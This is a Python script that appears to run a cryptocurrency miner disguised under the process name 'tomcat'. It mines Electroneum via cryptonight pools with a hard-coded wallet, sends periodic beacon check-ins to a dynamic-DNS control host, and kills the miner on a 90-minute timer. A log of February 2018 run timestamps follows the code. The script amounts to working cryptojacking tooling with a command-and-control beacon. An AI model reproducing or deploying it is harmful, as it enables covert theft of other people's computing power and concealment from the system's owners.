import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:06.918023
#2018-02-17 16:56:07.244497
#2018-02-17 18:46:05.406867
#2018-02-17 20:35:02.936598
#2018-02-17 22:21:04.709609
#2018-02-18 00:05:06.559973
#2018-02-18 01:56:05.367150
#2018-02-18 03:44:05.212927
#2018-02-18 05:32:06.743038
#2018-02-18 07:24:04.112449
#2018-02-18 09:12:02.075895
#2018-02-18 10:57:06.431597
#2018-02-18 12:44:01.436949
#2018-02-18 14:31:06.196696
#2018-02-18 16:21:07.544706
#2018-02-18 18:10:07.633734
#2018-02-18 19:56:07.538054
#2018-02-18 21:44:01.535360
#2018-02-18 23:33:01.525968
#2018-02-19 01:19:01.936829
#2018-02-19 03:07:02.165738
#2018-02-19 04:52:06.579777
#2018-02-19 06:36:06.598082
#2018-02-19 08:26:07.085383
#2018-02-19 10:15:05.232037
#2018-02-19 12:04:04.241124
#2018-02-19 13:50:11.236083
#2018-02-19 15:40:01.676982
#2018-02-19 17:27:05.304812
#2018-02-19 19:14:06.324173
#2018-02-19 21:01:08.063906
#2018-02-19 22:48:07.408365
#2018-02-20 00:33:01.959874
#2018-02-20 02:21:05.649170
#2018-02-20 04:11:07.456009
#2018-02-20 05:54:05.292242
#2018-02-20 07:39:01.463372
#2018-02-20 09:24:06.726212
#2018-02-20 11:08:07.363013
#2018-02-20 12:54:07.416472
#2018-02-20 14:40:07.376522
#2018-02-20 16:24:08.804582
#2018-02-20 18:12:04.336310
#2018-02-20 20:04:09.007233
#2018-02-20 21:52:01.913624
#2018-02-20 23:33:01.989712
#2018-02-21 01:18:05.445065
#2018-02-21 03:06:06.379035
#2018-02-21 04:54:03.737722
#2018-02-21 06:41:06.126317
#2018-02-21 08:29:05.136685
#2018-02-21 10:16:01.240200
#2018-02-21 12:03:07.191738
#2018-02-21 13:51:11.083507
#2018-02-21 15:37:04.531283
#2018-02-21 17:27:07.604111
#2018-02-21 19:14:05.089601
#2018-02-21 21:01:01.433203
#2018-02-21 22:47:05.788268
#2018-02-22 00:36:07.983407
#2018-02-22 02:25:05.716695
#2018-02-22 04:12:05.886814
#2018-02-22 05:57:02.168432
#2018-02-22 07:43:06.222593
#2018-02-22 09:32:05.950910
#2018-02-22 11:17:04.371793
#2018-02-22 13:02:07.526772
#2018-02-22 15:59:11.524255
#2018-02-22 17:45:15.321464
#2018-02-22 19:31:07.328780
#2018-02-22 21:23:04.612446
#2018-02-22 23:07:06.155497
#2018-02-23 00:53:04.887632
#2018-02-23 02:40:09.774147
#2018-02-23 04:29:01.624854
#2018-02-23 06:15:01.715939
#2018-02-23 08:02:05.979258
#2018-02-23 10:17:01.218475
#2018-02-23 12:07:07.902307
#2018-02-23 13:54:09.975491
#2018-02-23 15:45:08.790013
#2018-02-23 17:31:06.058252
#2018-02-23 19:19:01.649541
#2018-02-23 21:02:04.321913
#2018-02-23 22:48:04.320133
#2018-02-24 00:36:06.403643
#2018-02-24 02:26:08.406439
#2018-02-24 04:16:06.111344
#2018-02-24 06:04:05.479683
#2018-02-24 07:51:06.087049
#2018-02-24 09:35:08.573711
#2018-02-24 11:29:07.392674
#2018-02-24 13:18:05.702295
#2018-02-24 15:09:06.736362
#2018-02-24 16:58:05.346098
#2018-02-24 18:46:07.322196
#2018-02-24 20:37:04.779544
#2018-02-24 22:41:07.620389
#2018-02-25 01:48:06.466896
#2018-02-25 04:50:03.689170
#2018-02-25 08:11:05.069013